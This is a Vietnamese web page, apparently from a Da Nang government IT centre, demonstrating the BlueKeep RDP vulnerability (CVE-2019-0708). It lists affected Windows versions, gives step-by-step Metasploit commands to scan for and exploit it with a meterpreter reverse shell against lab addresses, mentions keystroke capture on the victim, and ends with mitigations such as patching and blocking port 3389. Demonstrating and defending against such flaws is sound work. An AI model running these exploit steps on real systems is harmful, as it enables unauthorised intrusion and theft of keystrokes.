Thực nghiệm lỗ hổng BLUEKEEP (CVE-2019-0708)
BlueKeep là một lỗ hổng thực thi mã từ xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ nghiêm trọng. Vào ngày 14/05/2019 Microsoft đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ Remote Desktop. Đáng lo ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác của người dùng.

1.     Giới thiệu:

BlueKeep là một lỗ hổng thực thi mã từ xa trong Dịch vụ kết nối Máy tính từ xa của Windows (Windows Remote Desktop Services). Lỗ hổng BlueKeep có định danh CVE-2019-0708, được đánh giá mức độ nghiêm trọng. Vào ngày 14/05/2019 Microsoft đã phát hành bản cập nhật cho lỗ hổng có mã CVE-2019-0708 tồn tại trong dịch vụ Remote Desktop. Đáng lo ngại, tin tặc có thể sử dụng lỗ hổng như một phương thức để phát tán mã độc đào tiền ảo, trojan ngân hàng hoặc các loại mã độc khác, mà không cần sự tương tác của người dùng.

2.     Các phiên bản ảnh hưởng:

-         Windows 2003

-         Windows XP

-         Windows 7

-         Windows Server 2008

-         Windows Server 2008 R2

3.     Cách kiểm tra và thực nghiệm


Tool sử dụng: Metasploit, TCPView

      Cài đặt và cập nhập metasploit mới nhất:

       apt update; apt install metasploit-framework

Kiểm tra

Hình 1 – Scan lỗ hổng bluekeep

Step 1: Khởi động msfconsole

Step 2: search bluekeep

Step 3: use auxiliary/scanner/rdp/cve_2019_0708_bluekeep

Step 4: set rhosts 192.168.8.129

Step 5: run

Thực nghiệm

Hình 2 – Thêm option cần thiết cho payload

Step 1: use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Step 2: set payload windows/x64/meterpreter/reverse_tcp

Step 3: set lhost 192.168.8.128

Step 4: set rhosts 192.168.8.129

Step 5: set target 1

Step 6: set groomsize 50

Step 7: exploit

 

Hình 3 – Kết quả khai thác


Hình 4 – Kịch bản khai thác keyscan trên máy nạn nhân

4.     Cách khắc phục

-         Sử dụng tool TCPView kiểm tra kết nối, phát hiện process có kết nối lạ đến, kill tiến trình đó.


-         Tạm thời chặn port 3389, nếu sử dụng thì giới hạn ip vào port.

-         Cập nhập bản vá tương ứng với hệ điều hành

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

 

Tin liên quan

Trang 1 / 11 - 110 dòngFirstPrevNextLast v
Trang 1 / 11 - 110 dòngFirstPrevNextLast v
chức năng nội bộ
dịch vụ khách hàng

VƯỜN ƯƠM DOANH NGHIỆP

Vườn ươm doanh nghiệp công nghệ thông tin thành phố Đà Nẵng tuyển các nhóm dự án mới cho năm 2021

Vườn ươm doanh nghiệp công nghệ thông tin thành phố Đà Nẵng mang trên mình sứ mệnh xây dựng một nơi ươm tạo chất lượng cao nhằm hỗ trợ và nuôi dưỡng các doanh nghiệp phần mềm, công nghệ thông tin vượt qua những khó khăn, rủi ro, thách thức trong giai đoạn đầu khởi nghiệp.

Các dự án ươm tạo tại Vườm ươm doanh nghiệp CNTT Đà Nẵng khóa 1

Ngày 20 tháng 9 năm 2018, “Vườn ươm doanh nghiệp công nghệ thông tin” chính thức đi vào hoạt động. Đến nay đã có 06 dự án được chấp thuận ươm tạo.

HƯỚNG DẪN ĐĂNG KÝ THAM GIA VƯỜN ƯƠM DOANH NGHIỆP

Vườn ươm Doanh nghiệp Công nghệ thông tin Đà Nẵng sẽ lựa chọn và ươm tạo các dự án khởi nghiệp trên cơ sở quy định về đối tượng, chính sách của Vườn ươm.

Vườn ươm doanh nghiệp công nghệ thông tin thành phố Đà Nẵng

Vườn ươm doanh nghiệp công nghệ thông tin thành phố Đà Nẵng mang trên mình sứ mệnh xây dựng một nơi ươm tạo chất lượng cao nhằm hỗ trợ và nuôi dưỡng các doanh nghiệp phần mềm, công nghệ thông tin vượt qua những khó khăn, rủi ro, thách thức trong giai đoạn đầu khởi nghiệp.

    CẢI CÁCH HÀNH CHÍNH-CHUYỂN ĐỔI SỐ

    Triển khai chương trình công tác cải cách hành chính năm 2023

    Căn cứ Kế hoạch số 36/KH-STTTT ngày 17/01/2023 của Sở Thông tin và Truyền thông thành phố Đà Nẵng, Trung tâm Phát triển hạ tầng công nghệ thông tin Đà Nẵng (gọi tắt là Trung tâm) ban hành Kế hoạch số 10/KH-TTPTHT ngày 19/01/2023 về việc Triển khai công tác cải cách hành chính năm 2023

    Đẩy mạnh chuyển đổi số trong lĩnh vực tài chính ngân hàng

    Sáng 10-5, Sở Thông tin và Truyền thông thành phố tổ chức Hội thảo “Chuyển đổi số trong lĩnh vực tài chính ngân hàng”. Phó Chủ tịch UBND thành phố Trần Phước Sơn tham dự chương trình.

    Cải cách hành chính năm 2022 và đến năm 2025

    Triển khai công tác cải cách hành chính năm 2022 và đến năm 2025, Trung tâm Phát triển hạ tầng công nghệ thông tin Đà Nẵng đã xây dựng Kế hoạch số 19/KH-TTPTHT ngày 24/01/2022 và Kế hoạch số 23/KH-TTPTHT ngày 27/01/2022

    Tuyên truyền chương trình cải cách hành chính năm 2021

    Căn cứ Kế hoạch số 15/KH-STTTT ngày 11 tháng 01 năm 2021 của Sở Thông tin và Truyền thông thành phố Đà Nẵng về việc Triển khai công tác cải cách hành chính năm 2021, Trung tâm Phát triển hạ tầng công nghệ thông tin Đà Nẵng (gọi tắt là Trung tâm) xây dựng Kế hoạch triển khai công tác cải cách hành chính năm 2021 tại Trung tâm

    Tiếp tục đẩy mạnh Cải cách hành chính trong năm 2020

    Trên cơ sở Kế hoạch số 34/KH-STTTT ngày 14/01/2020 của Sở Thông tin và Truyền thông thành phố Đà Nẵng, Trung tâm Phát triển hạ tầng CNTT Đà Nẵng ban hành Kế hoạch số 11/KH-TTPTHT ngày 17/01/2020 về việc triển khai công tác cải cách hành chính năm 2020

    Bộ TT&TT lấy ý kiến đóng góp cho Đề án Chuyển đổi số quốc gia

    Dự thảo Đề án Chuyển đổi số quốc gia phiên bản 1.0 hiện đã được Bộ TT&TT hoàn thành và đang đăng tải công khai trên Cổng thông tin điện tử của Bộ để lấy ý kiến đóng góp của các cơ quan, tổ chức, doanh nghiệp và người dân.

      Lượt truy cập
      Lượt truy cập: 21096332 Đang truy cập: 505

      Các đơn vị đối tác

      TRUNG TÂM PHÁT TRIỂN HẠ TẦNG CÔNG NGHỆ THÔNG TIN ĐÀ NẴNG

      Giấy phép: Số 151/GP-TTĐT do Sở Thông tin và Truyền thông cấp ngày 15/4/2015.

      Trưởng Ban biên tập: Phạm Thế Nhân, Phó giám đốc Trung tâm Phát triển hạ tầng Công nghệ thông tin Đà Nẵng.

      Trụ sở: Tòa nhà 02 Quang Trung, Phường Thạch Thang, Quận Hải Châu, Tp Đà Nẵng.

      Điện thoại: 84.236.3888.666 Fax 84.236.3888.879 Email: iid@danang.gov.vn.

      ipv6 ready